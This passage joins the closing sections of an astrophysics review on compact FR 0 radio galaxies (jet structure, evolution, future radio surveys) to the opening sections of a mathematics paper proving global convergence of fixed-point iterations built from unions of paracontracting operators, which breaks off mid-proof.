magnetization is needed, high spins are possibly required to launch the most relativistic jets, but observational evidence for the connection between BH spin and the jet is controversial and RQAGN with high spins have been observed (Reynolds, 2014), breaking the one-to-one correspondence between high BH spins and presence of jets. However, the lower BH spin of FR 0s would certainly contribute to the lower jet bulk speeds, observed in the form of lower jet sidedness than that of FR Is. To reconcile the common pc-scale \(L_{\rm core}\)-\(L_{\rm Bol}\) luminosity correlations valid for FR 0s and FR Is, the lower jet sidedness of FR 0s, their lack of kpc-scale emission, their putative \(\gamma\)-ray emission, the invoked (static, but valid also for a dynamic scenario) jet model for FR 0s comes from the well-known (stratified jet) "two-flow model" (Sol et al., 1989): an outer jet layer with a mildly relativistic velocity (\(v\sim 0.5c\)) surrounds an inner electron-positron jet spine, which moves at much higher relativistic speeds (bulk Lorentz factor \(\sim 10\)). The existence of two flows at different velocities provided a good agreement with both theoretical and observational constraints of RGs in general (Ghisellini et al., 2005). This model can provide a simple way to solve the discrepancy between the required high Lorentz factors to produce the observed \(\gamma\)-ray emission and the slower observed motion in jets at pc scales (Cheng and An, 2018; Chen et al., 2021). Based on this model, the inner beam of FR 0 jets is slower than that of FR I'. Similarly to what happens in FR I jets (Bicknell, 1984, 1995; Bowman et al., 1996; Laing and Bridle, 2014; Perucho et al., 2014), the jet spine of FR 0s could decelerate on kpc scale to sub-relativistic speeds for entrainment of external material. As suggested by the similar Mpc-scale environment, the unification of the FR 0s and weak BL Lacs in a single class of RGs characterised by a fainter slower spine than that of FR Is, finds supports from recent results which identify a large number of BL Lacs showing 'non classical' blazar-like properties and analogies with FR 0s (e.g. Liuzzo et al. 2013; Massaro et al. 2017; D'Ammando et al. 2018). Another parameter which can play a role in two-model flow jets for FR 0s is the prominence of one of the two components over the other. In fact, the picture of FR I jets as decelerating flows with transverse velocity gradients and with an intrinsic emissivity (prominence) differences between the spine and the sheath (a slow-moving boundary layer being more prominent than faster material near the centre, Komissarov 1990) finds observational support in resolved jet structures of individual sources (e.g., 3C 84, Giovannini et al. 2018; Cen A, Janssen et al. 2021). Similarly, in FR 0s, the large loss of radio emission from pc-scale structure with respect to the arcsec-scale cores indicates that the jet emissivity does not remain constant and the sheath emission dominates over the spine emission, which is hardly seen, even if boosted, with VLBI observations. In addition, an intrinsically weak spine and a brighter slower shear, supported by BZ and BP processes respectively, could account for the possible loss of jet stability for galaxy medium entertainment. On kpc scale the spine dies out, dragging the layer to disruption. Another advantage of a sheath-dominated jet is the formation of relativistic shocks between the jet layer of the two flows moving at different speeds, which can accelerate particles along the shock front and produce \(\gamma\)-ray emission by Inverse Compton (Wang et al., 2023). This would justify the \(\gamma\)-ray detection of FR 0 candidates (Baldi et al., 2019). Another parameter which takes part in shaping the jet structure is the composition, which is one of the major uncertainties in AGN physics. In powerful RGs, protons (or huge Poynting flux with a very low particle content) are needed in the spine to support the jet kinetic energy (De Young, 2006). Conversely, pure leptonic pair (electrons/positrons) jets are excluded, because the jet would be slowed down by Compton interactions. Croston et al. (2018) suggested that FR Is are likely dominated by hadrons (mostly protons) and FR IIs are dominated by leptons, FR 0 jets could be lighter than FR I/II jets, with a smaller hadronic component. This scenario would reduce the necessity for very high bulk \(\Gamma\)' factors for FR 0 jets and consequently would probably favour their jet instability by crossing the host galaxy. ### Dynamic scenarios The inclusion of a temporal variation of the accretion-ejection parameters across the RG lifetime span can better reproduce the different observed classes of RLAGN. The tracks in Fig. 18 based on parametric modeling present the expected evolutionary routes of a radio source that begins as a CSO and successfully evolves to FR I or FR IIs under conditions of long-duration AGN activity. If this standard evolutionary scenario is also applicable to the FR 0s and we consider FR 0s as progenitors of FR Is, FR 0s would correspond to the population of the low-power (\(P_{\rm 1.4\,GHz}<10^{24}\,\rm W\,Hz^{-1}\)) CSOs in their earliest evolutionary phase. Instead, the VLBI-resolved FR 0s with pc-scale jets may shift horizontally their position in the \(P\)-\(D\) diagram into the region of MS0s. According to the evolutionary model of FR 0s into low-power FR Is proposed by An and Baan (2012), it is necessary for the jet structure to remain preserved before breaking out of the host galaxy and for the AGN activity to last longer than \(10^{4}\) yr. However, due to their low radio power and susceptibility to jet fragmentation, only a small fraction of FR 0s would be capable of evolving beyond a few tens of kpc and becoming low-power FR Is. Furthermore, the much larger space density of FR 0s with respect to FR Is clearly clashes against the picture of all FR 0s as young FR Is and necessarily, not all RL CRSs may be destined to evolve into double RGs (Fanti et al., 1990, 1995). In fact, a uniform distribution of total lifetimes of RLAGN in the range 0-1000 Myr, estimated from low radio frequencies data, reproduces well the distributions of projected linear sizes of the powerful sources, \(10^{25}\lesssim L_{\rm 150\,MHz}\lesssim 10^{27}\,\rm W\,Hz^{-1}\), but diverges from the expectations for the large number of compact/small sources at lower luminosities, even when surface-brightness selection effects are taken into account (Hardcastle et al., 2019). To break this tension, the presence of RLAGN populations with distinct lifetime distributions or accretion-ejection mechanisms (e.g., FR 0 vs FR I/II) needs to be considered. A possible scenario to resolve the problem of the large abundance of compact RGs concerns an intermittent AGN activity. Baldi et al. (2018) stated that a radio activity recurrence, with the duration of the active phase covering a wide range of values and with short active periods of a few thousand years strongly favored with respect to longer ones, might account for the large density number of FR 0s. This would explain why their jets do not develop at large scales (Sadler et al., 2014). An occasional fueling of the central BH can significantly reduce the accretion rate and cause a discontinuous plasma injection in the jet and its possible rapid deceleration and instability within the galaxy. Particular conditions of magnetic field loop, which trap gas and grow magnetic instabilities, could lead to a stimulated BH (Czerny et al., 2009; Yuan and Narayan, 2014; Inayoshi et al., 2020). An 'aborted' jet scenario was invoked by Ghisellini et al. (2004) to account for the jetted RQAGN where the BH fails to eject an extended relativistic particle jet, if the central engine works intermittently. According to this model, a small difference in BH masses, as seen between FR Is and FR 0s, could play a role in aborting the nascent extended jets. Gopal-Krishna et al. (2008) suggested that a dependence of the jet phenomenon on the BH mass probably could drive a large amount of gas tidally stripped from stars by the central BH, which could truncate the jets in the BH vicinity due to mass loading from the stellar debris. In addition, there is recent evidence that some compact sources, possibly a fraction of the FR 0 population, are turning-off/fading (e.g., Kunert-Bajraszewska et al., 2005, 2006; Giroletti et al., 2005; Orienti et al., 2010) and short-lived due to accretion-related criticality (e.g. Czerny et al., 2009; Kunert-Bajraszewska et al., 2010; An and Baan, 2012; Kiehlmann et al., 2023). However, there is not still observational proof of different nuclear gas distribution between FR 0s and FR Is, which might lead to an intermittent BH feeding or a jet frustration of the former with respect to the long-lasting secular accretion and ejection of the latter (Balmaverde et al., 2006). Figure 18: Radio power vs. source size (\(P\)—\(D\) diagram) of RGs adopted from Cheng and An (2018) with data take from An and Baan (2012). Black squares are CSO, black circles are low-power GPSs, red diamonds are high-power GPSs, purple crosses are HFPs, green circles are low-power CSSs, blue open triangles are high-power CSSs, blue filled triangles are FR IIs, and green filled stars are FR Is. A further morphological sub-classification is also considered that distinguishes among CSO (\(<\) 1 kpc), MSO (1–15 kpc), and large symmetric objects (LSO; \(>\) 15 kpc, FR I/IIs) (Readhead, 1995). Red and blue dashed lines are illustrative of the evolutionary tracks based on parametric modeling for the high-power and low-power sources, respectively. The pc-scale FR 0s (red filled circles) studied by Cheng and An (2018) are situated in the bottom-left corner, occupied by low-power CSOs and some compact low-power MSOs. A temporal evolution of the BH spin within the gap paradigm predicts a FR 0 as a specific phase of a continuous activity in the family of RLAGN (Garofalo et al., 2010). As the gap region reduces in size with BH spin, the BZ/BP jet decreases in power. Instead, continuous mass accretion spins the BH up towards the angular momentum value of the accretion flow. An evolution of the BH spin configuration with the disc angular momentum can reduce or increase the gap region and change the BH spin magnitude. This dynamic process can accommodate the formation of a FR 0 population within two different scenarios: an accretion-driven or a merger-driven one. In a scenario where the BH spin depends on the accretion history of the system, the gap paradigm has been applied to FR 0s as low, prograde, spinning BHs whose progenitors are powerful FR II quasars (Garofalo and Singh, 2019) (Fig. 19). In gas rich mergers, powerful (FR II) HERGs emerge from a BH accreting in a cold mode, surrounded by a thin REAF disc with a retrograde accretion. Due to the powerful jet feedback, the disc moves into a RIAF disc on a timescale of about a few million years. The continuous accretion across the duty cycles will spin down the BHs, moving the system to lower luminosities with a FR II jet, as the retrograde BH approaches to zero (LERGs). As the BH spin moves to a prograde regime, the BZ-jet power increases as the spin increases. In this low BH spinning regime, jet is weaker than in the FR II stage and tends to level off in a stable state. In this region of BH-jet parameter space, FR 0s find their location, where weak, compact jets are found. As the system keeps on feeding the low-spinning prograde BH, the FR 0 moves to a full-fledged FR I, when the spin is sufficiently higher than 0.2 and the BH must accumulate 30% of its original mass. The large abundance of FR 0s with respect to the other FR classes can also be interpreted as a result of the limited gas availability in nearby ETGs. The paucity of gas in the FR 0 (small- and large-scale) environments slows down the transition from FR 0s to FR Is because of the low accretion rates. Therefore FR 0s are not young sources, but they are the result of a prolonged slow accretion of prograde low-spinning massive BHs over timescales of hundreds of millions - billions of years. One-sixth of this population succeeds to funnel sufficient fuel to the BH and ultimately turns into a FR I. The poorer Mpc-scale environment of FR 0s and the slightly smaller BH masses (galaxy masses) than those of FR Is are the two main evidences of a different cosmological evolution of FR 0s with respect to that of FR Is. Therefore, FR 0s are predicted to grow both in small groups (primarily) and in rich clusters. In a merger-driven scenario, major mergers are known to be the main mechanism for spinning-up BHs (Martinez-Sansigre and Rawlings, 2011; Bustamante and Springel, 2019). Since such objects are the result of BH-BH coalescence event, galaxies with higher masses are more likely to have undergone more mergers and therefore own high-spinning BHs. The simulations performed by Dubois et al. (2014) indicate that indeed the most massive BHs (\(\mathrm{M_{BH}}\gtrsim 10^{8}\,M_{\odot}\)), in particular those associated with gas-poor galaxies, acquire most of their mass through BH coalescence. In a poor environment, major mergers of galaxies with similar masses are rare, causing a limit on the formation of highly-spinning BHs. Although large-scale environment seems to generate a sort of difference in the BH spin distribution, the nature of the connection between environment and BH spin is still under debate, because opposite results have also been found (e.g.. Smethurst et al. 2019; Beckmann et al. 2023). However, in the standard picture, this merger-driven scenario would agree with the observational result that FR 0s and FR Is live in different environment. Consequently, in this scenario, a positive link between local galaxy density, BH parameters (mass and spin), and accretion rate is set. The poorer neighborhood of FR 0s, on a statistical basis, determines a longer phase of their lower BH spin than those of their companions FR Is, which live in richer environment. FR 0s in clusters of galaxies are likely formed recently and have not yet accreted a sufficient amount of mass onto their central BH to turn into a FR I. Conversely, rare FR Is in poor groups have likely undergone particular conditions (magnetic field, gas availability, reciprocal galaxy velocity, position in the cluster/group), which have led to an acceleration on their evolution from a FR 0 stage or a different duty cycle. However, the physical process which controls the connection between large-scale environment (Mpc scale) and the BH accretion (Bondi radius, tens and hundred pc) still remains to be understood and there is currently limited observational evidence to support the two proposed scenarios. In the nearby Universe, \(\sim\)70-80% of the RLAGN phase is spent in a compact-jet configuration. Given that \(\sim\)30% of the most massive galaxies are Figure 19: Focus on the temporal evolution of RGs according to the gap paradigm from high-powered FR II HERGs to FR I LERGs in a accretion-driven scenario. FR 0s represent a stage of this evolution, as prograde low-spinning BHs. \(a\) is the BH spin, the black thick and the blue curved arrows represent the BZ and BP jets, the blue oval and the red line represent the ADAF and the REAF discs, while the gray arrow in the REAF disc represents the disc wind, which is absent in ADAF states. Image reproduced with permission from Garofalo and Singh (2019), copyright by AAS. active and the activity must be constantly re-triggered so that the galaxy spends over a quarter of its time in an active state (Best et al., 2005a), the FR 0 phase is an important stage of the evolution of an ETG where their galactic-scale jets are continuously operating in maintenance mode. The large excess of RL CRSs over what would be expected from models in which all sources live to the same age (i.e. constant age models), particularly evident at lower radio luminosities (Shabala et al., 2008; Hardcastle et al., 2019; Shabala et al., 2020), suggests that the actual process of FR 0 evolution is longer than the phase spent as FR I and FR II. Assuming a monotonic jet expansion, the limited size of FR 0s would point to irregular duty cycles, where shorter active phases occur more often than the longer ones (Baldi et al., 2018, 2019a). However, this would conflict with the LOFAR result that the most massive galaxies are always switched on at some level at \(L_{150\,{\rm MHz}}\gtrsim 10^{21}\,{\rm W\,Hz}^{-1}\)(Sabater et al., 2019). Therefore, the large uncertainties on the origin and nature of FR 0 jets, the role of environmental and internal conditions on the duration of the compact phase, complicate the estimate of the duty cycle of FR 0s. ## 13 Conclusions and future perspective The BH accretion-ejection mechanism provides a major power source in the Universe and is believed to regulate the evolution of galaxies, by injecting energy and momentum. However, the details of how and when this occurs remain uncertain, particularly at low luminosities, where the majority of active BHs are expected. There is compelling evidence, supported by numerical simulations, that low-luminosity RGs channel the bulk of their accretion power into compact and galactic-scale jets (\(\sim\)1-10 kpc) which may have a significant impact on their hosts, regulating the SF, because they plough energy in the ISM more efficiently than powerful jets. Yet, a poor characterization of the jet physics and the AGN-host connection at low luminosities hampers our comprehension of the accretion-ejection paradigm, feedback and hence the galaxy evolution. The cross-correlation of high-sensitivity radio and optical surveys showed that the vast majority of local RGs (\(\sim\)80%) appear unresolved on arcsecond scales and shed light on a 'new' class of low-luminosity RGs, _FR 0s_, which lack of kpc-scale extended radio emission. This review about recent results on the multi-band properties of FR 0s collected enough evidence to conclude that FR 0s constitute a unique class of CRSs, which _can_ launch pc-scale jets with mildly relativistic bulk speeds, probably due to small (prograde) BH spins or lower magnetic fields in the BH vicinity. To solve the long-lasting question about the large abundance of RL CRSs with respect to what expected by standard RG evolution models, the puzzling nature of FR 0s and their impact on BH-galaxy evolution, an accurate census of the accretion-jet properties is needed with the following characteristics: i) a statistically complete sample to include all galaxy and AGN diversity to explore the role of each physical parameter that controls the accretion ejection and feedback processes; ii) in the radio band, because long-baseline radio arrays can isolate the low-brightness nuclear emission far better than any other instruments at higher energies; iii) at luminosities as low as possible to probe the very end of luminosity functions, ideally down to Sgr A* luminosity (\(\sim\)\(10^{15.5}\) W Hz); iv) in the local Universe to enable pc-scale spatial resolution to disentangle the relative AGN-SF contribution and probe small jet structures. The current and upcoming generation of radio arrays and surveys done with these facilities, LOFAR (Best and The LOFAR-UK Consortium, 2008; Shimwell et al., 2019; Hardcastle and Croston, 2020) and the International LOFAR Telescope (Morabito et al., 2022b, a), ASKAP (Norris et al., 2011; Riggi et al., 2021), MeerKAT (Jarvis et al., 2016; Heywood et al., 2022), SKA (Falcke et al., 2004; Kapinska et al., 2015), ngVLA (Nyland et al., 2018a, b), uGMRT (Gupta et al., 2017; Lal et al., 2021), DSA-2000 (Hallinan et al., 2021) and other radio antennae (e.g. ALMA, WSRT), will provide the cornerstone of our understanding of BH activity in the local Universe at low luminosities, across a wide range of galaxy types and environments. Because of their sub-arcsecond resolution and \(\mu\)Jy-level sensitivity, they will uncover the bulk population of CRSs, opening a new window onto the physical properties of FR 0s. For example, within the wide sky coverage of the LOFAR observations, the census of nearby active BHs at 150 GHz will count \(\sim\)3000 LLAGN with luminosities \(<10^{40}\) erg s\({}^{-1}\) at \(z<0.03\)(Sabater et al., 2019). The next step will be with the advent of SKA and ngVLA, which will survey vast numbers of nearby galaxies with unprecedented sensitivities at sub-arcsecond resolutions on a large range of radio frequencies (reaching \(\sim\)1 \(\mu\)Jy at \(<\)1 GHz over 30 deg\({}^{2}\) will detect \(\sim\)300,000 LLAGN, Prandoni and Seymour 2015; Padovani 2016). A multi-band cross-match with other surveys at higher frequencies (optical, X-ray) will trace a demography of local low-power jetted BHs and their interplay with galaxies, providing firmer constraints on models of accretion-ejection coupling in ordinary AGN (not quasar type) (Prandoni and Seymour, 2014, 2015). Low-frequency (\(<\)1 GHz) radio surveys with SKA precursors (e.g. ASKAP, MWA), LOFAR and GMRT are already extremely valuable for studying the putative extended emissions of FR 0s, because it remains crudely true that the observed duty cycle of AGN increases with decreasing frequency: this is because of the longer synchrotron lifetimes of the lower-energy relativistic particles at lower frequencies. Deep sub-arcsecond international LOFAR telescope observations could reveal the true extent of the penetration of FR 0 jet into the galaxy, by discovering synchrotron-aged plasma from past injection events. This would lead to a better characterization of the physical properties, duty cycles and kinetic power of FR 0 jets Combining hundreds-MHz information with GHz-observations can help to characterise the spectral shape of FR 0s to infer the fraction of optically thin, hence extended, emission present in FR 0 jets and eventually isolate the fraction of genuine young radio sources erroneously included in this class. High-resolution radio observations with long baseline arrays (e.g. eMERLIN, EVN, VLBA) are crucial to establish the fraction of jetted FR 0s on pc scale and derive the jet asymmetry and velocity distribution. With those ideas in mind, the future research on FR 0s will address the following key topics: * **Pc-scale accretion-ejection.** The origin of the inability of such a large population to grow kpc-scale jets is still a mystery. The separation of the genuine population of FR 0s with respect to other compact impostors (star forming galaxies, RQAGN, young RGs, blazars) is fundamental to identify the crucial aspects which can diagnose their jet limitations. Accretion and ejection studied with non-radio high-resolution data (e.g. Chandra, eROSITA, JWST, VLT, ELT) can help to disentangle the different contribution in RL CRS population and constraining models of disc and jets. * **High energy.** Several FR 0 as \(\gamma\)-ray emitters have been detected at the present time and are expected to be multi-messenger sources. It is important to continue the search for \(\gamma\)-ray emission from RL CRSs and LLAGN in general to study particle acceleration mechanisms at low powers. * **AGN feedback.** Several studies point to the result that RL CRSs can have a more efficient feedback on galaxy than powerful extended RGs. A single studied case of FR 0 driving turbulence and creating cavities in the X-ray atmosphere of a cluster is not sufficient to derive robust results on the effect of low-power jets of FR 0s in the surrounding medium. Systematic studies with deep multi-band data, combined with VLBI observations will provide a unique data set for advancing our comprehension of the interaction of the FR 0s with their environments. * **High redshifts.** There is evidence that the local FR 0 population has an important counterpart also at higher redshifts (\(z>1\)). A systematic study of the genuine FR 0s at the cosmic noon from deep fields would help to understand the formation and cosmic evolution of low-power RLAGN with respect to the other classes of RGs. * **Numerical simulations.** High resolution, 3D numerical simulations of low-power jets (total jet power \(<10^{44}\,\mathrm{erg\,s^{-1}}\)) can help to clarify the formation, propagation and impact of FR 0 jets in the galactic medium. ###### Acknowledgements. I am very grateful to friends and colleagues who provided thoughtful comments on the manuscript, especially A. Capetti, who helped me through fruitful discussions and inspired this review, and M. Brienza, G. Giovannini, P. Grandi, G. Migliori, and E. Torresi, who triggered a productive discussion on FR 0s. I thank L. Ferretti for offering me this wonderful opportunity to write this review and the anonymous referees for constructive comments and suggestions that greatly helped improve the manuscript. R.D.B. acknowledges financial support from INAF mini-grant "FR0 radio galaxies" (Bando Ricerca Fondamentale INAF 2022). This research has made use of NASA's Astrophysics Data System Bibliographic Services. This research has made use of the NASA/IPAC Extragalactic Database (NED), which is funded by the National Aeronautics and Space Administration and operated by the California Institute of Technology. The author has no conflicts of interest to declare. I certify that the submission is original work and is not under review at any other publication.
2304.09537
Global Convergence of Algorithms Based on Unions of Nonexpansive Maps
In his recent research M. K. Tam (2018) considered a framework for the analysis of iterative algorithms which can be described in terms of a structured set-valued operator. At each point in the ambient space, the value of the operator can be expressed as a finite union of values of single-valued paracontracting operators. He showed that the associated fixed point iteration is locally convergent around strong fixed points. This result generalizes a theorem due to Bauschke and Noll (2014). In the present paper we generalize the result of Tam and show the global convergence of his algorithm for an arbitrary starting point. An analogous result is also proved for the Krasnosel'ski-Mann iterations.
Alexander J. Zaslavski
2023-04-19T10:04:41Z
http://arxiv.org/abs/2304.09537v1
# Global Convergence of Algorithms Based on Unions of Nonexpansive Maps ###### Abstract In his recent research M. K. Tam (2018) considered a framework for the analysis of iterative algorithms which can be described in terms of a structured set-valued operator. At each point in the ambient space, the value of the operator can be expressed as a finite union of values of single-valued paracontracting operators. He showed that the associated fixed point iteration is locally convergent around strong fixed points. This result generalizes a theorem due to Bauschke and Noll (2014). In the present paper we generalize the result of Tam and show the global convergence of his algorithm for an arbitrary starting point. An analogous result is also proved for the Krasnosel'ski-Mann iterations. Keywords:Convergence analysis Fixed point Nonexpansive mapping Paracontracting operator Mathematics Subject Classification (2010): 47H04 47H10 ## 1 Introduction For more than sixty years now, there has been a lot of research activity in the study of the fixed point theory of nonexpansive operators [1; 8; 10; 11; 12; 13; 14; 15; 18; 19]. The starting point of this study is Banach's celebrated theorem [2] concerning the existence of a unique fixed point for a strict contraction. It also concerns the convergence of (inexact) iterates of a nonexpansive mapping to one of its fixed points. Since that seminal result, many developments have taken place in this field including, in particular, studies of feasibility, common fixed point problems and variational inequalities, which find important applications in mathematical analysis, optimization theory, and in engineering, medical and the natural sciences [3; 5; 8; 9; 15; 16; 18; 19]. In particular in [17], it was considered a framework for the analysis of iterative algorithms, which can be described in terms of a structured set-valued operator. Namely, at every point in the ambient space, it is assumed that the value of the operator can be expressed as a finite union of values of single-valued paracontracting operators. For such algorithms it was shown in [17] that the associated fixed point iteration is locally convergent around strong fixed points. In [6] an analogous result was obtained for Krasnosel'ski-Mann iterations. The result of [17] generalizes a theorem due to Bauschke and Noll [4]. In the present paper we generalize the main result of [17] and show the global convergence of the algorithm for an arbitrary starting point. An analogous result is also proved for the Krasnosel'ski-Mann iterations. ## 2 Global convergence of iterates Suppose that \((X,\rho)\) is a metric space and that \(C\subset X\) is its nonempty, closed set. For every point \(x\in X\) and every positive number \(r\) define \[B(x,r)=\{y\in X:\ \rho(x,y)\leq r\}.\] For each \(x\in X\) and each nonempty set \(D\subset X\) set \[\rho(x,D)=\inf\{\rho(x,y):\ y\in D\}.\] For every operator \(S:C\to C\) set \[\operatorname{Fix}(S)=\{x\in C:\ S(x)=x\}.\] Fix \[\theta\in C.\] Suppose that the following assumption holds: (A1) For each \(M>0\) the set \(B(\theta,M)\cap C\) is compact. Assume that \(m\) is a natural number, \(T_{i}:C\to C\), \(i=1,\ldots,m\) are continuous operators and that the following assumption holds: (A2) For every natural number \(i\in\{1,\ldots,m\}\), every point \(z\in\operatorname{Fix}(T_{i})\), every point \(x\in C\) and every \(y\in C\setminus\operatorname{Fix}(T_{i})\), we have \[\rho(z,T_{i}(x))\leq\rho(z,x)\] \[\rho(z,T_{i}(y))<\rho(z,y).\] Note that operators satisfying (A2) are called paracontractions [7]. Assume that for every point \(x\in X\), a nonempty set \[\phi(x)\subset\{1,\ldots,m\} \tag{1}\] is given. In other words, \[\phi:X\to 2^{\{1,\ldots,m\}}\setminus\{\emptyset\}.\] Suppose that the following assumption holds: (A3) For each \(x\in C\) there exists \(\delta>0\) such that for each \(y\in B(x,\delta)\cap C\), \[\phi(y)\subset\phi(x).\] Define \[T(x)=\{T_{i}(x):\;i\in\phi(x)\} \tag{2}\] for each \(x\in C\), \[\bar{F}(T)=\{z\in C:\;T_{i}(z)=z,\;i=1,\ldots,m\} \tag{3}\] and \[F(T)=\{z\in C:\;z\in T(z)\}. \tag{4}\] Assume that \[\bar{F}(T)\neq\emptyset.\] Denote by \(\mbox{Card}(D)\) the cardinality of a set \(D\). For each \(z\in R^{1}\) set \[\lfloor z\rfloor=\inf\{i:\;i\mbox{ is an integer and }i\leq z\}.\] In the sequel we suppose that the sum over empty set is zero. We study the asymptotic behavior of sequences of iterates \(x_{t+1}\in F(x_{t})\), \(t=0,1,\ldots\). In particular we are interested in their convergence to a fixed point of \(T\). This iterative algorithm was introduced in [17] which also contains its application to sparsity constrained minimisation. The following result, which is proved in Section 4, shows that almost all iterates of our set-valued mappings are approximated solutions of the corresponding fixed point problem. Many results of this type are collected in [18; 19]. Theorem 2.1: _Assume that \(M>0\), \(\epsilon\in(0,1)\) and that_ \[\bar{F}(T)\cap B(\theta,M)\neq\emptyset. \tag{5}\] _Then there exists an integer \(Q\geq 1\) such that for each sequence \(\{x_{i}\}_{i=0}^{\infty}\subset C\) which satisfy_ \[\rho(x_{0},\theta)\leq M\] _and_ \[x_{t+1}\in F(x_{t})\mbox{ for each integer }t\geq 0\] _the inequality_ \[\rho(x_{t},\theta)\leq 3M\] _holds for all integers \(t\geq 0\),_ \[\mbox{Card}(\{t\in\{0,1,\ldots,\}:\ \rho(x_{t},x_{t+1})>\epsilon\})\leq Q\] _and \(\lim_{t\to\infty}\rho(x_{t},x_{t+1})=0\)._ The following global convergence result is proved in Section 5. **Theorem 2.2**: _Assume that a sequence \(\{x_{t}\}_{t=0}^{\infty}\subset C\) and that for each integer \(t\geq 0\),_ \[x_{t+1}\in F(x_{t}).\] _Then there exist_ \[x_{*}=\lim_{t\to\infty}x_{t}\] _and a natural number \(t_{0}\) such that for each integer \(t\geq t_{0}\)_ \[\phi(x_{t})\subset\phi(x_{*})\] _and if an integer \(i\in\phi(x_{t})\) satisfies \(x_{t+1}=T_{i}(x_{t})\), then_ \[T_{i}(x_{*})=x_{*}.\] Theorem 2.2 generalizes the main result of [17] which establishes a local convergence of the iterative algorithm for iterates starting from a point belonging to a neighborhood of a strong fixed point belonging to the set \(\bar{F}(T)\). ## 3 An auxiliary result **Lemma 3.1**: _Assume that \(M,\epsilon>0\) and that \(z_{*}\in C\) satisfies_ \[T_{i}(z_{*})=z_{*},\;i=1,\ldots,m. \tag{6}\] _Then there exists \(\delta>0\) such that for each \(s\in\{1,\ldots,m\}\) and each \(x\in C\cap B(\theta,M)\) satisfying_ \[\rho(x,T_{s}(x))>\epsilon \tag{7}\] the inequality_ \[\rho(z_{*},T_{s}(x))\leq\rho(z_{*},x)-\delta \tag{8}\] _is true._ Proof: Let \(s\in\{1,\ldots,m\}\). It is sufficient to show that there exists \(\delta>0\) such that for each \(x\in C\cap B(\theta,M)\) satisfying (7) inequality (8) is true. Assume the contrary. Then for each integer \(k\geq 1\), there exists \[x_{k}\in C\cap B(\theta,M) \tag{9}\] such that \[\rho(x_{k},T_{s}(x_{k}))>\epsilon \tag{10}\] and \[\rho(z_{*},T_{s}(x_{k}))>\rho(z_{*},x_{k})-k^{-1}. \tag{11}\] In view of (A1) and (9), extracting a subsequence and re-indexing, we may assume without loss of generality that there exists \[x_{*}=\lim_{k\to\infty}x_{k}. \tag{12}\] By (9)-(12) and the continuity of \(T_{s}\), \[\rho(x_{*},\theta)\leq M,\] \[\rho(x_{*},T_{s}(x_{*}))=\lim_{k\to\infty}\rho(x_{k},T_{s}(x_{k}))\geq\epsilon\] and \[\rho(z_{*},T_{s}(x_{*}))\geq\rho(z_{*},x_{*}).\] This contradicts (6) and (A2). The contradiction we have reached proves Lemma 3.1. ## 4 Proof of Theorem 2.1 By (5), there exists \[z_{*}\in B(\theta,M)\cap\bar{F}(T). \tag{13}\] Lemma 3.1 implies that there exists \(\delta\in(0,\epsilon)\) such that the following property holds: (a) for each \(s\in\{1,\ldots,m\}\) and each \(x\in C\cap B(z_{*},2M)\) satisfying \[\rho(x,T_{s}(x))>\epsilon\] we have \[\rho(z_{*},T_{s}(x))\leq\rho(z_{*},x)-\delta.\] Choose a natural number \[Q\geq 2M\delta^{-1}. \tag{14}\] Assume that \(\{x_{i}\}_{i=0}^{\infty}\subset C\), \[\rho(x_{0},\theta)\leq M \tag{15}\] and that for each integer \(t\geq 0\), \[x_{t+1}\in F(x_{t}). \tag{16}\] Let \(t\geq 0\) be an integer. By (2) and (16), there exists \(s\in\{1,\ldots,m\}\) such that \[x_{t+1}=T_{s}(x_{t}). \tag{17}\] Assumption (A2) and equations (3), (13) and (17) imply that \[\rho(z_{*},x_{t+1})=\rho(z_{*},T_{s}(x_{t}))\leq\rho(z_{*},x_{t}). \tag{18}\] Since \(t\) is an arbitrary nonnegative integer equations (13), (15) and (18) imply that for each integer \(i\geq 0\), \[\rho(z_{*},x_{i})\leq\rho(z_{*},x_{0})\leq 2M \tag{19}\] and \[\rho(x_{i},\theta)\leq 3M.\] Assume that \[\rho(x_{t+1},x_{t})>\epsilon. \tag{20}\] Property (a) and equations (17), (19) and (20) imply that \[\rho(z_{*},x_{t+1})=\rho(z_{*},T_{s}(x_{t}))\leq\rho(z_{*},x_{t})-\delta.\] Thus we have shown that the following property holds: (b) if an integer \(t\geq 0\) satisfies (20), then \[\rho(z_{*},x_{t+1})\leq\rho(z_{*},x_{t})-\delta.\] Assume that \(n\geq 1\) is an integer. Property (b) and equations (18)-(20) imply that \[2M\geq\rho(z_{*},x_{0})\geq\rho(z_{*},x_{0})-\rho(z_{*},x_{n+1})\] \[=\sum_{t=0}^{n}(\rho(z_{*},x_{t})-\rho(z_{*},x_{t+1}))\] \[\geq\sum\{\rho(z_{*},x_{t})-\rho(z_{*},x_{t+1}):\;t\in\{0,\ldots,n\},\;\rho(x_ {t},x_{t+1})>\epsilon\}\] \[\geq\delta\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\rho(x_{t},x_{t+1})>\epsilon\})\] and in view of (14), \[\mbox{Card}(\{t\in\{0,\ldots,n\}:\;\rho(x_{t},x_{t+1})>\epsilon\})\leq 2M \delta^{-1}\leq Q.\] Since \(n\) is an arbitrary natural number we conclude that \[{\rm Card}(\{t\in\{0,1,\ldots\}:\ \rho(x_{t},x_{t+1})>\epsilon\})\leq Q.\] Since \(\epsilon\) is any element of \((0,1)\) Theorem 2.1 is proved. ## 5 Proof of Theorem 2.2 In view of Theorem 2.1, the sequence \(\{x_{t}\}_{t=0}^{\infty}\) is bounded. In view of (A1), it has a limit point \(x_{*}\in C\) and a subsequence \(\{x_{t_{k}}\}_{k=0}^{\infty}\) such that \[x_{*}=\lim_{k\to\infty}x_{t_{k}}. \tag{21}\] In view of (A3) and (21), we may assume without loss of generality that \[\phi(x_{t_{k}})\subset\phi(x_{*}),\;k=1,2,\ldots \tag{22}\] and that there exists \[\widehat{p}\in\phi(x_{*})\] such that \[x_{t_{k}+1}=T_{\widehat{p}}(x_{t_{k}}),\;k=1,2,\ldots. \tag{23}\] It follows from Theorem 2.1, the continuity of \(T_{\widehat{p}}\) and equations (21) and (23) that \[T_{\widehat{p}}(x_{*})=\lim_{k\to\infty}T_{\widehat{p}}(x_{t_{k}})=\lim_{k\to \infty}x_{t_{k}+1}=\lim_{k\to\infty}x_{t_{k}}=x_{*}. \tag{24}\] Set \[I_{1}=\{i\in\phi(x_{*}):\;T_{i}(x_{*})=x_{*}\},\;I_{2}=\phi(x_{*})\setminus I_ {1}. \tag{25}\] In view of (24) and (25), \[\widehat{p}\in I_{1}.\] Fix \(\delta_{0}\in(0,1)\) such that \[\rho(x_{*},T_{i}(x_{*}))>2\delta_{0},\;i\in I_{2}. \tag{26}\] Assumption (A3), the continuity of 